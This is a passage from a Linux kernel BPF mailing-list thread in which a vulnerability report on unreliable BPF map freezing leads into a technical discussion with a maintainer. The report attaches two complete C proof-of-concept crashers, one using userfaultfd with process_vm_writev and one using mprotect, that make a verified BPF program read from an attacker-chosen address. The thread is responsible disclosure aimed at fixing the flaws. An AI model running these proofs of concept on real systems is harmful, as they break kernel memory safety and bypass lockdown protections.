All of lore.kernel.org
 help / color / mirror / Atom feed
* BPF map freezing is unreliable; can we instead just inline constants?
@ 2020-04-08 16:56 Jann Horn
  2020-04-09 23:33 ` Andrii Nakryiko
  0 siblings, 1 reply; 11+ messages in thread
From: Jann Horn @ 2020-04-08 16:56 UTC (permalink / raw)
  To: bpf, Alexei Starovoitov, Daniel Borkmann; +Cc: Matthew Garrett

[-- Attachment #1: Type: text/plain, Size: 1520 bytes --]

Hi!

I saw that BPF allows root to create frozen maps, for which the
verifier then assumes that they contain constant values. However, map
freezing is pretty wobbly:

1. The syscalls for updating maps from userspace don't seem to lock
the map at all.
2. BPF doesn't account for the fact that mprotect() can be used to
arbitrarily flip VM_WRITE on and off as long as VM_MAYWRITE is set.
(crasher attached as bpf-constant-data-mprotect.c)
3. It is assumed that a memory mapping can't be used to write to a
page anymore after the mapping has been removed; but actually,
userspace can grab references to pages in a VMA and use those
references to write to the VMA's pages after the VMA has already been
closed. (crasher attached as bpf-constant-data-uffd.c, compile with
"gcc -pthread ...")

These things are probably not _huge_ concerns for most usecases, since
you need to be root to hit this stuff anyway - but I think it'd be
desirable for BPF to actually be memory-safe (and the kernel lockdown
folks would probably appreciate not having such a glaring hole that
lets root read/write arbitrary memory).

The third point is particularly hard to solve without adding more
constraints on the userspace API; I think that tightening up map
freezing would require ensuring that the map has *never* been mapped
as writable.

Is there a reason why the verifier doesn't replace loads from frozen
maps with the values stored in those maps? That seems like it would be
not only easier to secure, but additionally more performant.

[-- Attachment #2: bpf-constant-data-uffd.c --]
[-- Type: text/x-csrc, Size: 9947 bytes --]

#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/prctl.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <stdint.h>
#include <sys/socket.h>
#include <string.h>
#include <poll.h>
#include <sys/uio.h>
#include <fcntl.h>

#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))


/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1    BPF_REG_1
#define BPF_REG_ARG2    BPF_REG_2
#define BPF_REG_ARG3    BPF_REG_3
#define BPF_REG_ARG4    BPF_REG_4
#define BPF_REG_ARG5    BPF_REG_5
#define BPF_REG_CTX     BPF_REG_6
#define BPF_REG_FP      BPF_REG_10

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)         \
  ((struct bpf_insn) {                          \
    .code  = BPF_LD | BPF_DW | BPF_IMM,         \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = (__u32) (IMM) }),                  \
  ((struct bpf_insn) {                          \
    .code  = 0, /* zero is reserved opcode */   \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD)              \
  BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)        \
  ((struct bpf_insn) {                          \
    .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = OFF,                               \
    .imm   = 0 })
#define BPF_MOV64_REG(DST, SRC)                 \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_MOV | BPF_X,       \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_ALU32_IMM(OP, DST, IMM)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU | BPF_OP(OP) | BPF_K,      \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)        \
  ((struct bpf_insn) {                          \
    .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = OFF,                               \
    .imm   = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM)         \
  ((struct bpf_insn) {                          \
    .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = OFF,                               \
    .imm   = IMM })
#define BPF_EMIT_CALL(FUNC)                     \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_CALL,                \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF)          \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_OP(OP) | BPF_K,      \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = OFF,                               \
    .imm   = IMM })
#define BPF_EXIT_INSN()                         \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_EXIT,                \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_LD_ABS(SIZE, IMM)                   \
  ((struct bpf_insn) {                          \
    .code  = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_ALU64_REG(OP, DST, SRC)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,    \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_MOV64_IMM(DST, IMM)                 \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_MOV | BPF_K,       \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })

int bpf_(int cmd, union bpf_attr *attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int array_create(int value_size, int num_entries, unsigned int flags) {
  union bpf_attr create_map_attrs = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = 4,
      .value_size = value_size,
      .max_entries = num_entries,
      .map_flags = flags,
  };
  int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
  if (mapfd == -1)
    err(1, "map create");
  return mapfd;
}

void map_freeze(int fd) {
  union bpf_attr attr = {.map_fd = fd};
  if (bpf_(BPF_MAP_FREEZE, &attr))
    err(1, "freeze map");
}

int prog_load(struct bpf_insn *insns, size_t insns_count) {
  char verifier_log[100000];
  union bpf_attr create_prog_attrs = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = insns_count,
    .insns = (uint64_t)insns,
    .license = (uint64_t)GPLv2,
    .log_level = 2,
    .log_size = sizeof(verifier_log),
    .log_buf = (uint64_t)verifier_log
  };
  int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
  int errno_ = errno;
  printf("==========================\n%s==========================\n", verifier_log);
  errno = errno_;
  if (progfd == -1)
    err(1, "prog load");
  return progfd;
}

int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
  int progfd = prog_load(insns, insns_count);

  // hook eBPF program up to a socket
  // sendmsg() to the socket will trigger the filter
  // returning 0 in the filter should toss the packet
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
    err(1, "socketpair");
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
    err(1, "setsockopt");
  return socks[1];
}

void trigger_proc(int sockfd) {
  if (write(sockfd, "X", 1) != 1)
    err(1, "write to proc socket failed");
}

static unsigned long *uffd_mapping;
static unsigned long *mapping;

static void *thread_fn(void *dummy) {
  struct iovec local_iov = { .iov_base = uffd_mapping, .iov_len = 8 };
  struct iovec remote_iov = { .iov_base = mapping, .iov_len = 8 };
  if (process_vm_writev(getpid(), &local_iov, 1, &remote_iov, 1, 0) != 8)
    err(1, "process_vm_writev");
  return NULL;
}

int main(void) {
  int small_map = array_create(8, 1, BPF_F_RDONLY_PROG|BPF_F_MMAPABLE);

  /* map the small_map */
  mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, small_map, 0);

  /* set up a userfaultfd region as uffd_mapping */
  int uffd = syscall(__NR_userfaultfd, 0);
  if (uffd == -1)
    err(1, "userfaultfd");
  struct uffdio_api api = { .api = 0xAA };
  if (ioctl(uffd, UFFDIO_API, &api))
    err(1, "uffd api");
  uffd_mapping = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (uffd_mapping == MAP_FAILED)
    err(1, "mmap anon");
  struct uffdio_register reg = {
    .range = { .start = (unsigned long)uffd_mapping, .len = 0x1000 },
    .mode = UFFDIO_REGISTER_MODE_MISSING
  };
  if (ioctl(uffd, UFFDIO_REGISTER, &reg))
    err(1, "uffd register");

  /* start a thread that will take a reference to the BPF map's page,
   * then stall on the userfaultfd */
  pthread_t thread;
  if (pthread_create(&thread, NULL, thread_fn, NULL))
    err(1, "pthread_create");
  sleep(1);

  /* unmap the small_map; the other thread will still be holding a reference to the page in it */
  munmap(mapping, 0x1000);

  /* freeze the map */
  map_freeze(small_map);

  /* load a program while the map still contains zeroes */
  struct bpf_insn insns[] = {
    // r0 = &map[0]
    BPF_LD_MAP_FD(BPF_REG_ARG1, small_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // r1 = map[0]
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),

    // r2 = *(&map[0] + map[0])
    BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0),

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));

  /* unblock the other thread, which will then overwrite the map contents */
  unsigned long buf[0x1000/8] = { 0xdeae000000000000 };
  struct uffdio_copy copy = {
    .dst = (unsigned long)uffd_mapping,
    .src = (unsigned long)buf,
    .len = 0x1000
  };
  if (ioctl(uffd, UFFDIO_COPY, &copy))
    err(1, "uffd copy");
  if (pthread_join(thread, NULL))
    err(1, "pthread_join");

  /* run the program with bogus data */
  trigger_proc(sock_fd);
}

[-- Attachment #3: bpf-constant-data-mprotect.c --]
[-- Type: text/x-csrc, Size: 8239 bytes --]

#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <linux/prctl.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <stdint.h>
#include <sys/socket.h>
#include <string.h>
#include <poll.h>
#include <sys/uio.h>
#include <fcntl.h>

#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))


/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1    BPF_REG_1
#define BPF_REG_ARG2    BPF_REG_2
#define BPF_REG_ARG3    BPF_REG_3
#define BPF_REG_ARG4    BPF_REG_4
#define BPF_REG_ARG5    BPF_REG_5
#define BPF_REG_CTX     BPF_REG_6
#define BPF_REG_FP      BPF_REG_10

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)         \
  ((struct bpf_insn) {                          \
    .code  = BPF_LD | BPF_DW | BPF_IMM,         \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = (__u32) (IMM) }),                  \
  ((struct bpf_insn) {                          \
    .code  = 0, /* zero is reserved opcode */   \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD)              \
  BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)        \
  ((struct bpf_insn) {                          \
    .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = OFF,                               \
    .imm   = 0 })
#define BPF_MOV64_REG(DST, SRC)                 \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_MOV | BPF_X,       \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_ALU32_IMM(OP, DST, IMM)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU | BPF_OP(OP) | BPF_K,      \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)        \
  ((struct bpf_insn) {                          \
    .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = OFF,                               \
    .imm   = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM)         \
  ((struct bpf_insn) {                          \
    .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = OFF,                               \
    .imm   = IMM })
#define BPF_EMIT_CALL(FUNC)                     \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_CALL,                \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF)          \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_OP(OP) | BPF_K,      \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = OFF,                               \
    .imm   = IMM })
#define BPF_EXIT_INSN()                         \
  ((struct bpf_insn) {                          \
    .code  = BPF_JMP | BPF_EXIT,                \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_LD_ABS(SIZE, IMM)                   \
  ((struct bpf_insn) {                          \
    .code  = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \
    .dst_reg = 0,                               \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })
#define BPF_ALU64_REG(OP, DST, SRC)             \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,    \
    .dst_reg = DST,                             \
    .src_reg = SRC,                             \
    .off   = 0,                                 \
    .imm   = 0 })
#define BPF_MOV64_IMM(DST, IMM)                 \
  ((struct bpf_insn) {                          \
    .code  = BPF_ALU64 | BPF_MOV | BPF_K,       \
    .dst_reg = DST,                             \
    .src_reg = 0,                               \
    .off   = 0,                                 \
    .imm   = IMM })

int bpf_(int cmd, union bpf_attr *attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int array_create(int value_size, int num_entries, unsigned int flags) {
  union bpf_attr create_map_attrs = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = 4,
      .value_size = value_size,
      .max_entries = num_entries,
      .map_flags = flags,
  };
  int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
  if (mapfd == -1)
    err(1, "map create");
  return mapfd;
}

void map_freeze(int fd) {
  union bpf_attr attr = {.map_fd = fd};
  if (bpf_(BPF_MAP_FREEZE, &attr))
    err(1, "freeze map");
}

int prog_load(struct bpf_insn *insns, size_t insns_count) {
  char verifier_log[100000];
  union bpf_attr create_prog_attrs = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = insns_count,
    .insns = (uint64_t)insns,
    .license = (uint64_t)GPLv2,
    .log_level = 2,
    .log_size = sizeof(verifier_log),
    .log_buf = (uint64_t)verifier_log
  };
  int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
  int errno_ = errno;
  printf("==========================\n%s==========================\n", verifier_log);
  errno = errno_;
  if (progfd == -1)
    err(1, "prog load");
  return progfd;
}

int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
  int progfd = prog_load(insns, insns_count);

  // hook eBPF program up to a socket
  // sendmsg() to the socket will trigger the filter
  // returning 0 in the filter should toss the packet
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
    err(1, "socketpair");
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
    err(1, "setsockopt");
  return socks[1];
}

void trigger_proc(int sockfd) {
  if (write(sockfd, "X", 1) != 1)
    err(1, "write to proc socket failed");
}

int main(void) {
  int small_map = array_create(8, 1, BPF_F_RDONLY_PROG|BPF_F_MMAPABLE);

  map_freeze(small_map);

  struct bpf_insn insns[] = {
    // r0 = &map[0]
    BPF_LD_MAP_FD(BPF_REG_ARG1, small_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // r1 = map[0]
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),

    // r2 = *(&map[0] + map[0])
    BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0),

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));

  unsigned long *mapping = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, small_map, 0);
  if (mapping == MAP_FAILED) err(1, "mmap");
  if (mprotect(mapping, 0x1000, PROT_READ|PROT_WRITE))
    err(1, "mprotect");
  *mapping = 0xdeae000000000000;

  trigger_proc(sock_fd);
}

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-08 16:56 BPF map freezing is unreliable; can we instead just inline constants? Jann Horn
@ 2020-04-09 23:33 ` Andrii Nakryiko
  2020-04-10  8:46   ` Jann Horn
  0 siblings, 1 reply; 11+ messages in thread
From: Andrii Nakryiko @ 2020-04-09 23:33 UTC (permalink / raw)
  To: Jann Horn; +Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett

On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
>
> Hi!
>
> I saw that BPF allows root to create frozen maps, for which the
> verifier then assumes that they contain constant values. However, map
> freezing is pretty wobbly:
>
> 1. The syscalls for updating maps from userspace don't seem to lock
> the map at all.

True, there is a tiny race between freezing and map updates, but I
don't think it's possible to solve it without taking locks all around
the place in map update operations.


> 2. BPF doesn't account for the fact that mprotect() can be used to
> arbitrarily flip VM_WRITE on and off as long as VM_MAYWRITE is set.
> (crasher attached as bpf-constant-data-mprotect.c)

Yeah, my bad. I wasn't aware of VM_MAYWRITE. I'll post a fix dropping
VM_MAYWRITE (and VM_MAYEXEC while at that...) for frozen maps. That
should fix bpf-constant-mprotect.c

> 3. It is assumed that a memory mapping can't be used to write to a
> page anymore after the mapping has been removed; but actually,
> userspace can grab references to pages in a VMA and use those
> references to write to the VMA's pages after the VMA has already been
> closed. (crasher attached as bpf-constant-data-uffd.c, compile with
> "gcc -pthread ...")

Please help me understand how that works (assuming we drop
VM_MAYWRITE, of course). You mmap() as R/W, then munmap(), then
freeze(). After munmap() refcount of writable pages should drop to
zero. And mmap'ed address should be invalid and unmapped. I'm missing
how after munmap() parallel thread still can write to that memory
page?

>
> These things are probably not _huge_ concerns for most usecases, since
> you need to be root to hit this stuff anyway - but I think it'd be
> desirable for BPF to actually be memory-safe (and the kernel lockdown
> folks would probably appreciate not having such a glaring hole that
> lets root read/write arbitrary memory).
>
> The third point is particularly hard to solve without adding more
> constraints on the userspace API; I think that tightening up map
> freezing would require ensuring that the map has *never* been mapped
> as writable.

I'm clearly missing how memory can remain mmaped() after single mmap()
+ munmap(), I'd really appreciate if you could elaborate, thanks!

>
> Is there a reason why the verifier doesn't replace loads from frozen
> maps with the values stored in those maps? That seems like it would be
> not only easier to secure, but additionally more performant.

Verifier doesn't always know exact offset at which program is going to
read read-only map contents. So something like this works:

const volatile long arr[256];

int x = rand() % 256;
int y = arr[x];

In this case verifier doesn't really know the value of y, so it can't
be inlined. Then you can have code in which in one branch register is
loaded with known value, but in another branch same register gets some
value at random offset. Constant tracking is code path-sensitive,
while instructions are shared between different code paths. Unless I'm
missing what you are proposing :)

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-09 23:33 ` Andrii Nakryiko
@ 2020-04-10  8:46   ` Jann Horn
  2020-04-10 20:48     ` Andrii Nakryiko
  0 siblings, 1 reply; 11+ messages in thread
From: Jann Horn @ 2020-04-10  8:46 UTC (permalink / raw)
  To: Andrii Nakryiko; +Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett

On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
<andrii.nakryiko@gmail.com> wrote:
> On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> >
> > Hi!
> >
> > I saw that BPF allows root to create frozen maps, for which the
> > verifier then assumes that they contain constant values. However, map
> > freezing is pretty wobbly:
> >
> > 1. The syscalls for updating maps from userspace don't seem to lock
> > the map at all.
>
> True, there is a tiny race between freezing and map updates, but I
> don't think it's possible to solve it without taking locks all around
> the place in map update operations.

Yeah. So I think BPF should do exactly that. Or change the userspace
API so that userspace has to say at map creation time "I'll freeze
this map later", and then you only have to do the locking if that flag
is set.

[...]
> > 3. It is assumed that a memory mapping can't be used to write to a
> > page anymore after the mapping has been removed; but actually,
> > userspace can grab references to pages in a VMA and use those
> > references to write to the VMA's pages after the VMA has already been
> > closed. (crasher attached as bpf-constant-data-uffd.c, compile with
> > "gcc -pthread ...")
>
> Please help me understand how that works (assuming we drop
> VM_MAYWRITE, of course). You mmap() as R/W, then munmap(), then
> freeze(). After munmap() refcount of writable pages should drop to
> zero. And mmap'ed address should be invalid and unmapped. I'm missing
> how after munmap() parallel thread still can write to that memory
> page?

The mmap()/munmap() syscalls place references to the pages the kernel
is using in the page tables of the process. Some other syscalls (such
as process_vm_writev()) can read these page table entries, take their
own references on those backing pages, and then continue to access
those pages even after they've been removed from the task's page
tables by munmap(). This works as long as the page table entries don't
have magic marker bits on them that prohibit this, which you get if
you use something like remap_pfn_range() in a loop instead of
remap_vmalloc_range() - but the memory mappings created by that
syscall are weird, and e.g. some syscalls like read() and write()
might sometimes fail if the buffer argument points into such a memory
region.

[...]
> > Is there a reason why the verifier doesn't replace loads from frozen
> > maps with the values stored in those maps? That seems like it would be
> > not only easier to secure, but additionally more performant.
>
> Verifier doesn't always know exact offset at which program is going to
> read read-only map contents. So something like this works:
>
> const volatile long arr[256];
>
> int x = rand() % 256;
> int y = arr[x];
>
> In this case verifier doesn't really know the value of y, so it can't
> be inlined. Then you can have code in which in one branch register is
> loaded with known value, but in another branch same register gets some
> value at random offset. Constant tracking is code path-sensitive,
> while instructions are shared between different code paths. Unless I'm
> missing what you are proposing :)

Ah, I missed that possibility. But is that actually something that
people do in practice? Or would it be okay for the verifier to just
assume an unknown value in these cases?

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-10  8:46   ` Jann Horn
@ 2020-04-10 20:48     ` Andrii Nakryiko
  2020-04-14 16:07       ` Jann Horn
  0 siblings, 1 reply; 11+ messages in thread
From: Andrii Nakryiko @ 2020-04-10 20:48 UTC (permalink / raw)
  To: Jann Horn; +Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett

On Fri, Apr 10, 2020 at 1:47 AM Jann Horn <jannh@google.com> wrote:
>
> On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
> <andrii.nakryiko@gmail.com> wrote:
> > On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> > >
> > > Hi!
> > >
> > > I saw that BPF allows root to create frozen maps, for which the
> > > verifier then assumes that they contain constant values. However, map
> > > freezing is pretty wobbly:
> > >
> > > 1. The syscalls for updating maps from userspace don't seem to lock
> > > the map at all.
> >
> > True, there is a tiny race between freezing and map updates, but I
> > don't think it's possible to solve it without taking locks all around
> > the place in map update operations.
>
> Yeah. So I think BPF should do exactly that. Or change the userspace
> API so that userspace has to say at map creation time "I'll freeze
> this map later", and then you only have to do the locking if that flag
> is set.

I'd love to be able to create frozen maps from the get go (and specify
initial values for the map), but freezing is done the way it's done
already, unfortunately :(
Regarding locking, maps could be updated from BPF program side as
well. I'd be curious to hear what others think about this issue.

>
> [...]
> > > 3. It is assumed that a memory mapping can't be used to write to a
> > > page anymore after the mapping has been removed; but actually,
> > > userspace can grab references to pages in a VMA and use those
> > > references to write to the VMA's pages after the VMA has already been
> > > closed. (crasher attached as bpf-constant-data-uffd.c, compile with
> > > "gcc -pthread ...")
> >
> > Please help me understand how that works (assuming we drop
> > VM_MAYWRITE, of course). You mmap() as R/W, then munmap(), then
> > freeze(). After munmap() refcount of writable pages should drop to
> > zero. And mmap'ed address should be invalid and unmapped. I'm missing
> > how after munmap() parallel thread still can write to that memory
> > page?
>
> The mmap()/munmap() syscalls place references to the pages the kernel
> is using in the page tables of the process. Some other syscalls (such
> as process_vm_writev()) can read these page table entries, take their
> own references on those backing pages, and then continue to access
> those pages even after they've been removed from the task's page
> tables by munmap(). This works as long as the page table entries don't
> have magic marker bits on them that prohibit this, which you get if
> you use something like remap_pfn_range() in a loop instead of
> remap_vmalloc_range() - but the memory mappings created by that
> syscall are weird, and e.g. some syscalls like read() and write()
> might sometimes fail if the buffer argument points into such a memory
> region.

So mmap() subsystem won't event know about those extra references and
thus we can't really account that in our code, right? That's sad, but
hopefully those APIs are root-only?

>
> [...]
> > > Is there a reason why the verifier doesn't replace loads from frozen
> > > maps with the values stored in those maps? That seems like it would be
> > > not only easier to secure, but additionally more performant.
> >
> > Verifier doesn't always know exact offset at which program is going to
> > read read-only map contents. So something like this works:
> >
> > const volatile long arr[256];
> >
> > int x = rand() % 256;
> > int y = arr[x];
> >
> > In this case verifier doesn't really know the value of y, so it can't
> > be inlined. Then you can have code in which in one branch register is
> > loaded with known value, but in another branch same register gets some
> > value at random offset. Constant tracking is code path-sensitive,
> > while instructions are shared between different code paths. Unless I'm
> > missing what you are proposing :)
>
> Ah, I missed that possibility. But is that actually something that
> people do in practice? Or would it be okay for the verifier to just
> assume an unknown value in these cases?

Verifier will assume unknown value for the branch that has variable
offset. It can't do the same for another branch (with constant offset)
because it might not yet have encountered branch with variable offset.
But either way, you were proposing to rewrite instruction and inline
read constant, and I don't think it's possible because of this.

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: BPF map freezing is unreliable; can we instead just inline constants?
  2020-04-10 20:48     ` Andrii Nakryiko
@ 2020-04-14 16:07       ` Jann Horn
  2020-04-14 19:46         ` Andrii Nakryiko
  0 siblings, 1 reply; 11+ messages in thread
From: Jann Horn @ 2020-04-14 16:07 UTC (permalink / raw)
  To: Andrii Nakryiko; +Cc: bpf, Alexei Starovoitov, Daniel Borkmann, Matthew Garrett

On Fri, Apr 10, 2020 at 10:48 PM Andrii Nakryiko
<andrii.nakryiko@gmail.com> wrote:
> On Fri, Apr 10, 2020 at 1:47 AM Jann Horn <jannh@google.com> wrote:
> > On Fri, Apr 10, 2020 at 1:33 AM Andrii Nakryiko
> > <andrii.nakryiko@gmail.com> wrote:
> > > On Wed, Apr 8, 2020 at 12:42 PM Jann Horn <jannh@google.com> wrote:
> > > >
> > > > Hi!
> > > >
> > > > I saw that BPF allows root to create frozen maps, for which the
> > > > verifier then assumes that they contain constant values. However, map
> > > > freezing is pretty wobbly:
> > > >
> > > > 1. The syscalls for updating maps from userspace don't seem to lock
> > > > the map at all.
> > >
> > > True, there is a tiny race between freezing and map updates, but I
> > > don't think it's possible to solve it without taking locks all around
> > > the place in map update operations.
> >
> > Yeah. So I think BPF should do exactly that. Or change the userspace
> > API so that userspace has to say at map creation time "I'll freeze
> > this map later", and then you only have to do the locking if that flag
> > is set.
>
> I'd love to be able to create frozen maps from the get go (and specify
> initial values for the map), but freezing is done the way it's done
> already, unfortunately :(
> Regarding locking, maps could be updated from BPF program side as
